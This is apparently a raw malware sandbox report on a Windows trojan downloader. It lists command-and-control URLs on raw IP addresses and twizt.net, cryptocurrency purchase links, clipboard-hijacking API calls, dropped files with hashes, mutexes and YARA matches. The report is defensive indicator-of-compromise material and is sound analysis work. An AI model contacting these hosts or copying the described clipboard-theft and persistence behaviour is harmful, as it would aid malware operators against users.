                            Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000002.3857092737.0000000000910000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/_2
                            Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/_21hXd#
                            Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000910000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/_2g
                            Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/_2ih0d.
                            Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000002.3857092737.0000000000910000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/_3
                            Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/_39h
                            Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/_3Qh8d/
                            Source: winploravr.exe, winploravr.exe, 0000000E.00000002.1927342041.00000000000F3000.00000002.00000001.01000000.0000000D.sdmp, winploravr.exe, 0000000E.00000000.1906559266.00000000000F3000.00000002.00000001.01000000.0000000D.sdmp, winploravr.exe, 00000011.00000002.2008324273.00000000002A3000.00000002.00000001.01000000.0000000A.sdmp, winploravr.exe, 00000011.00000000.1987852595.00000000002A3000.00000002.00000001.01000000.0000000A.sdmp, SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe, winploravr.exe.7.dr, sysbrapsvc.exe.0.dr, winploravr.exe0.7.dr, 3193211493.exe.2.dr, 1146722911.exe.2.drString found in binary or memory: http://91.202.233.141/
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.0000000000678000.00000004.00000020.00020000.00000000.sdmp, sysbrapsvc.exe, 00000002.00000002.3857411843.000000000060E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/1
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.000000000060E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/1S4
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.0000000000678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/1xF;
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.0000000000678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/2
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.0000000000678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/2:
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.0000000000678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/3
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.000000000060E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/4
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.000000000060E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/4e
                            Source: sysbrapsvc.exe, 00000002.00000002.3861073060.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, sysbrapsvc.exe, 00000002.00000002.3857411843.000000000065E000.00000004.00000020.00020000.00000000.sdmp, sysbrapsvc.exe, 00000002.00000002.3857411843.000000000060E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/5
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.000000000060E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/5G4
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.000000000065E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/5V
                            Source: sysbrapsvc.exe, 00000002.00000002.3861073060.00000000006D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/5Y
                            Source: sysbrapsvc.exe, 00000002.00000002.3861073060.00000000006D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/5e
                            Source: sysbrapsvc.exe, 00000002.00000002.3861073060.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, sysbrapsvc.exe, 00000002.00000002.3860975696.0000000000692000.00000004.00000020.00020000.00000000.sdmp, sysbrapsvc.exe, 00000002.00000002.3857411843.000000000065E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/6
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.000000000065E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/6.F;
                            Source: sysbrapsvc.exe, 00000002.00000002.3861073060.00000000006D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/6P
                            Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000002.3857092737.0000000000910000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/_1
                            Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000910000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/_11
                            Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000910000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/_11N:we
                            Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000910000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/_16
                            Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000910000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/_1K
                            Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000002.3857092737.0000000000910000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/_2
                            Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/_2yk
                            Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/_3
                            Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/_3yh
                            Source: sysbrapsvc.exe, 00000002.00000002.3866327336.0000000004780000.00000004.00000020.00020000.00000000.sdmp, 2006625995.exe, 2006625995.exe, 0000000A.00000002.2106010574.0000000000D74000.00000002.00000001.01000000.0000000B.sdmp, 2006625995.exe, 0000000A.00000000.1869234828.0000000000D74000.00000002.00000001.01000000.0000000B.sdmp, 2006625995.exe.2.drString found in binary or memory: http://icanhazip.com/
                            Source: sysbrapsvc.exe, 00000002.00000002.3866327336.0000000004780000.00000004.00000020.00020000.00000000.sdmp, 2006625995.exe, 0000000A.00000002.2106010574.0000000000D74000.00000002.00000001.01000000.0000000B.sdmp, 2006625995.exe, 0000000A.00000000.1869234828.0000000000D74000.00000002.00000001.01000000.0000000B.sdmp, 2006625995.exe.2.drString found in binary or memory: http://icanhazip.com/.
                            Source: 3193211493.exe.2.drString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                            Source: 3193211493.exe.2.drString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                            Source: 330125677.exe, 0000000F.00000002.2003173720.00000000005B5000.00000004.00000020.00020000.00000000.sdmp, 330125677.exe, 0000000F.00000002.2003173720.000000000059D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/
                            Source: 330125677.exe, 330125677.exe, 0000000F.00000002.2003173720.000000000059D000.00000004.00000020.00020000.00000000.sdmp, 330125677.exe, 0000000F.00000000.1953132722.00000000006F2000.00000002.00000001.01000000.0000000E.sdmp, 330125677.exe, 0000000F.00000002.2003173720.000000000055E000.00000004.00000020.00020000.00000000.sdmp, 330125677.exe, 0000000F.00000002.2003454543.00000000006F2000.00000002.00000001.01000000.0000000E.sdmp, 330125677.exe, 0000000F.00000002.2003173720.0000000000586000.00000004.00000020.00020000.00000000.sdmp, 330125677.exe.2.drString found in binary or memory: http://twizt.net/ALLSTATA
                            Source: 330125677.exe, 0000000F.00000002.2003173720.0000000000586000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/ALLSTATA7a
                            Source: 330125677.exe, 0000000F.00000002.2003173720.0000000000586000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/ALLSTATAWaIG2
                            Source: 330125677.exe, 0000000F.00000002.2003173720.000000000055E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/ALLSTATAnt
                            Source: 330125677.exe, 0000000F.00000002.2003173720.0000000000586000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/ALLSTATAo
                            Source: 330125677.exe, 0000000F.00000000.1953132722.00000000006F2000.00000002.00000001.01000000.0000000E.sdmp, 330125677.exe, 0000000F.00000002.2003454543.00000000006F2000.00000002.00000001.01000000.0000000E.sdmp, 330125677.exe.2.drString found in binary or memory: http://twizt.net/ALLSTATAopen%temp%%s
                            Source: 2006625995.exe, 2006625995.exe, 0000000A.00000002.2106010574.0000000000D74000.00000002.00000001.01000000.0000000B.sdmp, 2006625995.exe, 0000000A.00000000.1869234828.0000000000D74000.00000002.00000001.01000000.0000000B.sdmp, 2006625995.exe.2.drString found in binary or memory: https://bitpay.com/buy-bitcoin/?crypto=BTC
                            Source: 2006625995.exe, 2006625995.exe, 0000000A.00000002.2106010574.0000000000D74000.00000002.00000001.01000000.0000000B.sdmp, 2006625995.exe, 0000000A.00000000.1869234828.0000000000D74000.00000002.00000001.01000000.0000000B.sdmp, 2006625995.exe.2.drString found in binary or memory: https://cex.io/buy-bitcoins
                            Source: 2006625995.exe, 2006625995.exe, 0000000A.00000002.2106010574.0000000000D74000.00000002.00000001.01000000.0000000B.sdmp, 2006625995.exe, 0000000A.00000000.1869234828.0000000000D74000.00000002.00000001.01000000.0000000B.sdmp, 2006625995.exe.2.drString found in binary or memory: https://invity.io/buy-crypto
                            Source: sysbrapsvc.exe, 00000002.00000002.3861073060.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, sysbrapsvc.exe, 00000002.00000003.1794455255.00000000006D5000.00000004.00000020.00020000.00000000.sdmp, sysbrapsvc.exe, 00000002.00000003.1794598121.00000000006D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com405117-2476756634-1002LMEM
                            Source: 2006625995.exe, 2006625995.exe, 0000000A.00000002.2106010574.0000000000D74000.00000002.00000001.01000000.0000000B.sdmp, 2006625995.exe, 0000000A.00000000.1869234828.0000000000D74000.00000002.00000001.01000000.0000000B.sdmp, 2006625995.exe.2.drString found in binary or memory: https://nexo.com/buy-crypto/bitcoin-btc
                            Source: 2006625995.exe, 2006625995.exe, 0000000A.00000002.2106010574.0000000000D74000.00000002.00000001.01000000.0000000B.sdmp, 2006625995.exe, 0000000A.00000000.1869234828.0000000000D74000.00000002.00000001.01000000.0000000B.sdmp, 2006625995.exe.2.drString found in binary or memory: https://paybis.com/
                            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeCode function: 0_2_004048A0 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,isalpha,isdigit,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_004048A0
                            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeCode function: 0_2_004048A0 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,isalpha,isdigit,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_004048A0
                            Source: C:\Windows\sysbrapsvc.exeCode function: 2_2_004048A0 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,isalpha,isdigit,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_004048A0
                            Source: C:\Windows\sysbrapsvc.exeCode function: 4_2_004048A0 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,isalpha,isdigit,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,4_2_004048A0
                            Source: C:\Users\user\AppData\Local\Temp\3193211493.exeCode function: 5_2_004048A0 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,isalpha,isdigit,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_004048A0
                            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeCode function: 0_2_00405910 GetWindowLongW,SetClipboardViewer,SetWindowLongW,SetWindowLongW,SendMessageA,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SendMessageA,RegisterRawInputDevices,ChangeClipboardChain,DefWindowProcA,0_2_00405910
                            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeCode function: 0_2_00405910 GetWindowLongW,SetClipboardViewer,SetWindowLongW,SetWindowLongW,SendMessageA,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SendMessageA,RegisterRawInputDevices,ChangeClipboardChain,DefWindowProcA,0_2_00405910

                            Spam, unwanted Advertisements and Ransom Demands

                            barindex
                            Source: Yara matchFile source: SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe, type: SAMPLE
                            Source: Yara matchFile source: 5.0.3193211493.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.sysbrapsvc.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.0.sysbrapsvc.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.3193211493.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.2.sysbrapsvc.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.0.SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.0.sysbrapsvc.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000000.1395571963.0000000000410000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000000.1558944525.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000000.1416106928.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000000.1544428131.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000003.1665949097.0000000004781000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.1416145697.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe PID: 6832, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: sysbrapsvc.exe PID: 5588, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: sysbrapsvc.exe PID: 768, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: 3193211493.exe PID: 3640, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Windows\sysbrapsvc.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\3193211493.exe, type: DROPPED
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeCode function: 7_2_00DB1100 CryptImportKey,CreateFileW,GetFileSize,CreateFileMappingA,MapViewOfFile,CryptCreateHash,GetProcessHeap,RtlAllocateHeap,CryptHashData,CryptVerifySignatureA,memcpy,GetProcessHeap,HeapFree,UnmapViewOfFile,FindCloseChangeNotification,SetFilePointer,SetEndOfFile,CloseHandle,CryptDestroyKey,7_2_00DB1100
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeCode function: 7_2_00DB1020 memcpy,memcpy,CryptImportKey,CryptEncrypt,CryptDestroyKey,7_2_00DB1020
                            Source: C:\Users\user\winploravr.exeCode function: 9_2_002A1020 memcpy,memcpy,CryptImportKey,CryptEncrypt,CryptDestroyKey,9_2_002A1020
                            Source: C:\Users\user\winploravr.exeCode function: 9_2_002A1100 CryptImportKey,CreateFileW,GetFileSize,CreateFileMappingA,MapViewOfFile,CryptCreateHash,GetProcessHeap,HeapAlloc,CryptHashData,CryptVerifySignatureA,memcpy,GetProcessHeap,HeapFree,UnmapViewOfFile,CloseHandle,SetFilePointer,SetEndOfFile,CloseHandle,CryptDestroyKey,9_2_002A1100
                            Source: C:\Windows\winploravr.exeCode function: 14_2_000F1100 CryptImportKey,CreateFileW,GetFileSize,CreateFileMappingA,MapViewOfFile,CryptCreateHash,GetProcessHeap,HeapAlloc,CryptHashData,CryptVerifySignatureA,memcpy,GetProcessHeap,HeapFree,UnmapViewOfFile,CloseHandle,SetFilePointer,SetEndOfFile,CloseHandle,CryptDestroyKey,14_2_000F1100
                            Source: C:\Windows\winploravr.exeCode function: 14_2_000F1020 memcpy,memcpy,CryptImportKey,CryptEncrypt,CryptDestroyKey,14_2_000F1020
                            Source: C:\Windows\sysbrapsvc.exeProcess Stats: CPU usage > 49%
                            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeCode function: 0_2_0040D950 NtQuerySystemTime,RtlTimeToSecondsSince1980,0_2_0040D950
                            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeCode function: 0_2_0040F589 NtQueryVirtualMemory,0_2_0040F589
                            Source: C:\Windows\sysbrapsvc.exeCode function: 2_2_0040D950 NtQuerySystemTime,RtlTimeToSecondsSince1980,2_2_0040D950
                            Source: C:\Windows\sysbrapsvc.exeCode function: 2_2_0040F589 NtQueryVirtualMemory,2_2_0040F589
                            Source: C:\Windows\sysbrapsvc.exeCode function: 4_2_0040D950 NtQuerySystemTime,RtlTimeToSecondsSince1980,4_2_0040D950
                            Source: C:\Windows\sysbrapsvc.exeCode function: 4_2_0040F589 NtQueryVirtualMemory,4_2_0040F589
                            Source: C:\Users\user\AppData\Local\Temp\3193211493.exeCode function: 5_2_0040D950 NtQuerySystemTime,RtlTimeToSecondsSince1980,5_2_0040D950
                            Source: C:\Users\user\AppData\Local\Temp\3193211493.exeCode function: 5_2_0040F589 NtQueryVirtualMemory,5_2_0040F589
                            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeFile created: C:\Windows\sysbrapsvc.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeFile created: C:\Windows\winploravr.exeJump to behavior
                            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeCode function: 0_2_004040900_2_00404090
                            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeCode function: 0_2_004048A00_2_004048A0
                            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeCode function: 0_2_0040F34C0_2_0040F34C
                            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeCode function: 0_2_00407FD00_2_00407FD0
                            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeCode function: 0_2_00407FF90_2_00407FF9
                            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeCode function: 0_2_0040A9B00_2_0040A9B0
                            Source: C:\Windows\sysbrapsvc.exeCode function: 2_2_004040902_2_00404090
                            Source: C:\Windows\sysbrapsvc.exeCode function: 2_2_004048A02_2_004048A0
                            Source: C:\Windows\sysbrapsvc.exeCode function: 2_2_0040F34C2_2_0040F34C
                            Source: C:\Windows\sysbrapsvc.exeCode function: 2_2_00407FD02_2_00407FD0
                            Source: C:\Windows\sysbrapsvc.exeCode function: 2_2_00407FF92_2_00407FF9
                            Source: C:\Windows\sysbrapsvc.exeCode function: 2_2_0040A9B02_2_0040A9B0
                            Source: C:\Windows\sysbrapsvc.exeCode function: 4_2_004040904_2_00404090
                            Source: C:\Windows\sysbrapsvc.exeCode function: 4_2_004048A04_2_004048A0
                            Source: C:\Windows\sysbrapsvc.exeCode function: 4_2_0040F34C4_2_0040F34C
                            Source: C:\Windows\sysbrapsvc.exeCode function: 4_2_00407FD04_2_00407FD0
                            Source: C:\Windows\sysbrapsvc.exeCode function: 4_2_00407FF94_2_00407FF9
                            Source: C:\Windows\sysbrapsvc.exeCode function: 4_2_0040A9B04_2_0040A9B0
                            Source: C:\Users\user\AppData\Local\Temp\3193211493.exeCode function: 5_2_004040905_2_00404090
                            Source: C:\Users\user\AppData\Local\Temp\3193211493.exeCode function: 5_2_004048A05_2_004048A0
                            Source: C:\Users\user\AppData\Local\Temp\3193211493.exeCode function: 5_2_0040F34C5_2_0040F34C
                            Source: C:\Users\user\AppData\Local\Temp\3193211493.exeCode function: 5_2_00407FD05_2_00407FD0
                            Source: C:\Users\user\AppData\Local\Temp\3193211493.exeCode function: 5_2_00407FF95_2_00407FF9
                            Source: C:\Users\user\AppData\Local\Temp\3193211493.exeCode function: 5_2_0040A9B05_2_0040A9B0
                            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\1146722911.exe FB11B4E2D26812E26EA7428F3B0B9BB8A16814188250FA60697C7AEC40A49BD0
                            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\1245832676.exe 8A169CF165F635ECB6C55CACECB2C202C5FC6EF5FA82EC9CDB7D4B0300F35293
                            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\2006625995.exe F63C124598C87BED71A1E5E6EC5A04E8AA2F18F94B21D690513C5490F7F85991
                            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\2303012543.exe 8A169CF165F635ECB6C55CACECB2C202C5FC6EF5FA82EC9CDB7D4B0300F35293
                            Source: SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: classification engineClassification label: mal100.troj.evad.winEXE@23/24@3/57
                            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeCode function: 0_2_00406B50 Sleep,GetModuleFileNameW,GetVolumeInformationW,GetDiskFreeSpaceExW,_aulldiv,wsprintfW,wsprintfW,wsprintfW,Sleep,ExitThread,0_2_00406B50
                            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeCode function: 0_2_00407250 CoCreateInstance,0_2_00407250
                            Source: C:\Windows\sysbrapsvc.exeFile created: C:\Users\user\tbtnds.datJump to behavior
                            Source: C:\Windows\sysbrapsvc.exeMutant created: \Sessions\1\BaseNamedObjects\b7x663937xa
                            Source: C:\Users\user\AppData\Local\Temp\2006625995.exeMutant created: \Sessions\1\BaseNamedObjects\4463464*
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeMutant created: \Sessions\1\BaseNamedObjects\xouauxuax
                            Source: C:\Windows\sysbrapsvc.exeFile created: C:\Users\user\AppData\Local\Temp\3193211493.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeCommand line argument: xouauxuax7_2_00DB1840
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeCommand line argument: uxuax7_2_00DB1840
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeCommand line argument: winploravr.exe7_2_00DB1840
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeCommand line argument: %windir%7_2_00DB1840
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeCommand line argument: %s\%s7_2_00DB1840
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeCommand line argument: %userprofile%7_2_00DB1840
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeCommand line argument: %s\%s7_2_00DB1840
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeCommand line argument: UpdatesOverride7_2_00DB1840
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeCommand line argument: UpdatesOverride7_2_00DB1840
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeCommand line argument: %s%s7_2_00DB1840
                            Source: C:\Users\user\winploravr.exeCommand line argument: xouauxuax9_2_002A1840
                            Source: C:\Users\user\winploravr.exeCommand line argument: uxuax9_2_002A1840
                            Source: C:\Users\user\winploravr.exeCommand line argument: winploravr.exe9_2_002A1840
                            Source: C:\Users\user\winploravr.exeCommand line argument: 46*9_2_002A1840
                            Source: C:\Users\user\winploravr.exeCommand line argument: L6*9_2_002A1840
                            Source: C:\Users\user\winploravr.exeCommand line argument: d6*9_2_002A1840
                            Source: C:\Users\user\winploravr.exeCommand line argument: h6*9_2_002A1840
                            Source: C:\Users\user\winploravr.exeCommand line argument: l6*9_2_002A1840
                            Source: C:\Users\user\winploravr.exeCommand line argument: %windir%9_2_002A1840
                            Source: C:\Users\user\winploravr.exeCommand line argument: %s\%s9_2_002A1840
                            Source: C:\Users\user\winploravr.exeCommand line argument: %userprofile%9_2_002A1840
                            Source: C:\Users\user\winploravr.exeCommand line argument: %s\%s9_2_002A1840
                            Source: C:\Users\user\winploravr.exeCommand line argument: UpdatesOverride9_2_002A1840
                            Source: C:\Users\user\winploravr.exeCommand line argument: UpdatesOverride9_2_002A1840
                            Source: C:\Users\user\winploravr.exeCommand line argument: d6*h6*l6*9_2_002A1840
                            Source: C:\Users\user\winploravr.exeCommand line argument: d6*h6*l6*9_2_002A1840
                            Source: C:\Users\user\winploravr.exeCommand line argument: %s%s9_2_002A1840
                            Source: C:\Users\user\AppData\Local\Temp\2006625995.exeCommand line argument: 4463464*10_2_00D72720
                            Source: C:\Windows\winploravr.exeCommand line argument: xouauxuax14_2_000F1840
                            Source: C:\Windows\winploravr.exeCommand line argument: uxuax14_2_000F1840
                            Source: C:\Windows\winploravr.exeCommand line argument: winploravr.exe14_2_000F1840
                            Source: C:\Windows\winploravr.exeCommand line argument: %windir%14_2_000F1840
                            Source: C:\Windows\winploravr.exeCommand line argument: %s\%s14_2_000F1840
                            Source: C:\Windows\winploravr.exeCommand line argument: %userprofile%14_2_000F1840
                            Source: C:\Windows\winploravr.exeCommand line argument: %s\%s14_2_000F1840
                            Source: C:\Windows\winploravr.exeCommand line argument: UpdatesOverride14_2_000F1840
                            Source: C:\Windows\winploravr.exeCommand line argument: UpdatesOverride14_2_000F1840
                            Source: C:\Windows\winploravr.exeCommand line argument: %s%s14_2_000F1840
                            Source: C:\Users\user\AppData\Local\Temp\300129380.exeCommand line argument: 0"?18_2_003F10A0
                            Source: C:\Users\user\AppData\Local\Temp\300129380.exeCommand line argument: d"?18_2_003F10A0
                            Source: C:\Users\user\AppData\Local\Temp\300129380.exeCommand line argument: \#?18_2_003F10A0
                            Source: C:\Users\user\AppData\Local\Temp\300129380.exeCommand line argument: WinCfgMgr18_2_003F10A0
                            Source: C:\Users\user\AppData\Local\Temp\300129380.exeCommand line argument: \$?18_2_003F10A0
                            Source: C:\Users\user\AppData\Local\Temp\300129380.exeCommand line argument: (%?18_2_003F10A0
                            Source: C:\Users\user\AppData\Local\Temp\300129380.exeCommand line argument: `%?18_2_003F10A0
                            Source: C:\Users\user\AppData\Local\Temp\300129380.exeCommand line argument: 0&?18_2_003F10A0
